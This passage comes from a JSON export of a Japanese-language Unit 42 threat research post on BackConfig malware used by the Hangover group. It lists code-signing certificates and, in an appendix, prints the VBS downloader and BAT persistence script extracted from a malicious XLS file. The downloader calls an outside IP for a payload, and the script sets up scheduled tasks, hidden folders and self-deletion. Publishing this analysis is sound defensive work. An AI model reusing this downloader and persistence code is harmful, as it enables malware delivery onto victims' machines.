PE\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u78ba\u8a8d\u3055\u308c\u305f\u3082\u306e\u306b\u306e\u307f\u95a2\u9023\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h5><strong>Foxit:<\/strong><\/h5>\n<ul>\n<li>thumbprint: 79635cb32cf16cf6bddfd563b09d7aa99ccb2c01<\/li>\n<li>issuer: CN=Foxit Software Incorporated<\/li>\n<li>subject: CN=Foxit Software Incorporated<\/li>\n<li>version: 3<\/li>\n<li>algorithm: sha1WithRSAEncryption<\/li>\n<li>serial: 50:53:ce:ad:42:c2:70:84:4f:55:bc:76:a4:23:6c:c8<\/li>\n<li>valid from: 1\/1\/2018<\/li>\n<li>valid to: 1\/1\/2024<\/li>\n<\/ul>\n<h5><strong>Wind0ws:<\/strong><\/h5>\n<ul>\n<li>thumbprint: aa9010ff841c67cf8fb88d7f1e86a778b35bcba0<\/li>\n<li>issuer: CN=wind0ws<\/li>\n<li>subject: CN=wind0ws<\/li>\n<li>version: 3<\/li>\n<li>algorithm: sha1WithRSAEncryption<\/li>\n<li>serial: 88:de:2e:60:7f:48:2c:81:44:54:32:29:98:22:69:70<\/li>\n<li>valid from: 1\/1\/2019<\/li>\n<li>valid to: 1\/1\/2025<\/li>\n<\/ul>\n<h5><strong>NVIDIA:<\/strong><\/h5>\n<ul>\n<li>thumbprint: 01ba433fdc7f9b1ad1baaea6c5fd69243d03d8c3<\/li>\n<li>issuer: CN=NVIDIA 
Corporation<\/li>\n<li>subject: CN=NVIDIA Corporation<\/li>\n<li>version: 3<\/li>\n<li>algorithm: sha1WithRSAEncryption<\/li>\n<li>serial: 6d:39:d4:59:15:9e:8c:b3:41:da:bd:4c:dd:37:60:e1<\/li>\n<li>valid from: 1\/1\/2019<\/li>\n<li>valid to: 1\/1\/2025<\/li>\n<\/ul>\n<h3><a id=\"post-107263-appendix\"><\/a>\u4ed8\u9332<\/h3>\n<p>\u4ee5\u4e0b\u306eVBS\u30b3\u30fc\u30c9\u3068BAT\u30b3\u30fc\u30c9\u306f\u3001XLS\u30b5\u30f3\u30d7\u30eb(SHA-256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c)\u304b\u3089\u62bd\u51fa\u3055\u308c\u305f\u3082\u306e\u3067\u3059\u3002<\/p>\n<h4>VBS\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u30fc\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8<br \/>\n<span style=\"font-size: 10pt;\">(SHA256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1)<\/span><\/h4>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">[Drive.txt -&gt; Drive.vbs CODE]<\/span><\/p>\n<pre class=\"lang:default decode:true\">strFileURL = \"http:\/\/<strong>185.203.119[.]184\/Dropbox\/request\"<\/strong> \r\nSet oShell = CreateObject(\"WScript.Shell\") \r\n     strHomeFolder = \r\noShell.ExpandEnvironmentStrings(\"%USERPROFILE%\") \r\n     strPath = \"<strong>C:\\Drivers\\dphc.exe\"<\/strong> \r\nOn Error Resume Next \r\nSet objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") \r\n    objXMLHTTP.open \"GET\", strFileURL, false \r\n    objXMLHTTP.send() \r\nIf objXMLHTTP.Status = 200 Then \r\nSet objADOStream = CreateObject(\"ADODB.Stream\") \r\nobjADOStream.Open \r\nobjADOStream.Type = 1  \r\nobjADOStream.Write objXMLHTTP.ResponseBody \r\nobjADOStream.Position = 0     \r\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\") \r\nIf objFSO.Fileexists(strPath) Then WScript.Quit() \r\nSet objFSO = Nothing \r\nobjADOStream.SaveToFile strPath \r\nobjADOStream.Close \r\nSet objADOStream = Nothing \r\nEnd if \r\nSet objXMLHTTP = Nothing  \r\n<\/pre>\n<h4>\u300cSetup\u300dBAT\u30b3\u30f3\u30dd\u30fc\u30cd\u30f3\u30c8<\/h4>\n<p>[Audio.txt -&gt; 
Audio.bat CODE]<\/p>\n<pre class=\"lang:default decode:true\">Set oFile = fso.CreateTextFile(\"c:\\Drivers\\Audio.txt\")\r\noFile.WriteLine (\"echo off\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Adobe\\Driver\\pdf\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Adobe\\Driver\\dwg\")\r\noFile.WriteLine (\"md %USERPROFILE%\\Daily\\Backup\\Files\")\r\noFile.WriteLine (\"attrib +a +h +s %USERPROFILE%\\Adobe\")\r\noFile.WriteLine (\"attrib +a +h +s %USERPROFILE%\\Daily\")\r\noFile.WriteLine (\"attrib +a +h +s C:\\Drivers\")\r\noFile.WriteLine (\"del \/f \r\n%USERPROFILE%\\Adobe\\Driver\\pdf\\pid.txt\")\r\noFile.WriteLine (\"del \/f \r\n%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\"\r\noFile.WriteLine (\"SET \/A %COMPUTERNAME%\")\r\noFile.WriteLine (\"SET \/A RAND=%RANDOM% 10000 + 1\")\r\noFile.WriteLine (\"echo %COMPUTERNAME%-%RAND% &gt;&gt; \r\n%USERPROFILE%\\Adobe\\Driver\\pdf\\pid.txt\")\r\noFile.WriteLine (\"echo %COMPUTERNAME%-%RAND% &gt;&gt; \r\n<strong>%USERPROFILE%\\Adobe\\Driver\\dwg\\pid.txt\")<\/strong>\r\noFile.WriteLine (\"schtasks \/delete \/tn Winmgt_log \/f\")\r\noFile.WriteLine (\"schtasks \/delete \/tn Yahoo_Drive \/f\")\r\noFile.WriteLine (\"schtasks \/create \/sc minute \/mo 10 \/f \/tn \r\nWinmgt_log \/tr C:\\Drivers\\dphc.exe\")\r\noFile.WriteLine (\"schtasks \/create \/sc minute \/mo 20 \/f \/tn \r\nYahoo_Drive \/tr C:\\Drivers\\Drive.vbs\")\r\noFile.WriteLine (\"ren C:\\Drivers\\Drive.txt Drive.vbs \")\r\noFile.WriteLine (\"del %0\")\r\noFile.Close\r\nSet fso = Nothing\r\nSet oFile = Nothing\r\n\r\n    Dim OldName, NewName\r\n    GivenLocation = \"C:\\Drivers\\\"\r\n    OldName = \"Audio.txt\"\r\n    <strong>NewName = \"Audio.bat\"<\/strong>\r\n    On Error Resume Next\r\n    Name GivenLocation &amp; OldName As GivenLocation &amp; NewName\r\n    Dim RetVal\r\n    RetVal = Shell(\"C:\\Drivers\\Audio.bat\", vbHide)\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 Unit 
42\u306f\u3001Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d\u3001Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u95a2\u9023\u3059\u308b\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u3001\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u3063\u3066\u89b3\u5bdf\u3057\u307e\u3057\u305f\u3002\u73fe<\/p>\n","protected":false},"author":46,"featured_media":101175,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4321,1974,4428],"tags":[6305,6328,4587],"product_categories":[4346,4442,4443,4444,4448],"coauthors":[635,935],"class_list":["post-107263","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research","category-malware-ja","category-threat-research-ja","tag-backconfig-ja","tag-hangover-threat-group","tag-spear-phishing-ja","product_categories-advanced-threat-prevention","product_categories-advanced-threat-prevention-ja","product_categories-advanced-url-filtering-ja","product_categories-advanced-wildfire-ja","product_categories-cortex-xdr-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2<\/title>\n<meta name=\"description\" content=\"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy 
Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\" \/>\n<meta property=\"og:description\" content=\"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002\" \/>\n<meta property=\"og:url\" 
content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2020-05-15T06:40:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-15T06:41:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"2001\" \/>\n\t<meta property=\"og:image:height\" content=\"1001\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Alex Hinchliffe, Robert Falcone\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2","description":"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy 
Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","og_locale":"ja_JP","og_type":"article","og_title":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2","og_description":"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","og_site_name":"Unit 
42","article_published_time":"2020-05-15T06:40:12+00:00","article_modified_time":"2020-05-15T06:41:33+00:00","og_image":[{"width":2001,"height":1001,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","type":"image\/png"}],"author":"Alex Hinchliffe, Robert Falcone","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/"},"author":{"name":"Alex Hinchliffe","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7d51f04a2afcca497cde7076d89d516f"},"headline":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2","datePublished":"2020-05-15T06:40:12+00:00","dateModified":"2020-05-15T06:41:33+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/"},"wordCount":10985,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","keywords":["BackConfig","Hangover Threat Group","Spear Phishing"],"articleSection":["Threat 
Research","\u30de\u30eb\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/","name":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","datePublished":"2020-05-15T06:40:12+00:00","dateModified":"2020-05-15T06:41:33+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7d51f04a2afcca497cde7076d89d516f"},"description":"Hangover\u8105\u5a01\u30b0\u30eb\u30fc\u30d7(\u5225\u540d Neon\u3001Viceroy 
Tiger\u3001MONSOON)\u304c\u4f7f\u7528\u3059\u308bBackConfig\u30de\u30eb\u30a6\u30a7\u30a2\u95a2\u9023\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u904e\u53bb4\u304b\u6708\u9593\u306b\u308f\u305f\u308a\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u73fe\u5730\u306e\u6642\u4e8b\u554f\u984c\u3092\u30eb\u30a2\u30fc\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u306e\u6a19\u7684\u306b\u306f\u6771\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u30fb\u8ecd\u4e8b\u65bd\u8a2d\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3057\u305f\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#primaryimage","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/11\/Malware-r3d2-1.png","width":2001,"height":1001},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/updated-backconfig-malware-targeting-government-and-military-organizations\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"\u5357\u30a2\u30b8\u30a2\u306e\u653f\u5e9c\u6a5f\u95a2\u3068\u8ecd\u4e8b\u65bd\u8a2d\u3092\u6a19\u7684\u3068\u3059\u308b\u3001\u66f4\u65b0\u3055\u308c\u305fBackConfig\u30de\u30eb\u30a6\u30a7\u30a2"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetw
orks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7d51f04a2afcca497cde7076d89d516f","name":"Alex Hinchliffe","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/4ffb3c2d260a0150fb91b3715442f8b3","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Alex Hinchliffe"},"url":"https:\/\/unit42.paloaltonetworks.com\/ja\/author\/alex-hinchliffe\/"}]}},"_links":{"self":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/107263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/46"}],"replies":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=107263"}],"version-history":[{"count":7,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/107263\/revisions"}],"predecessor-version":[{"id":107294,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/107263\/revisions\/107294"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/101175"}],"wp:attachment":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=1072
63"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=107263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=107263"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=107263"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=107263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}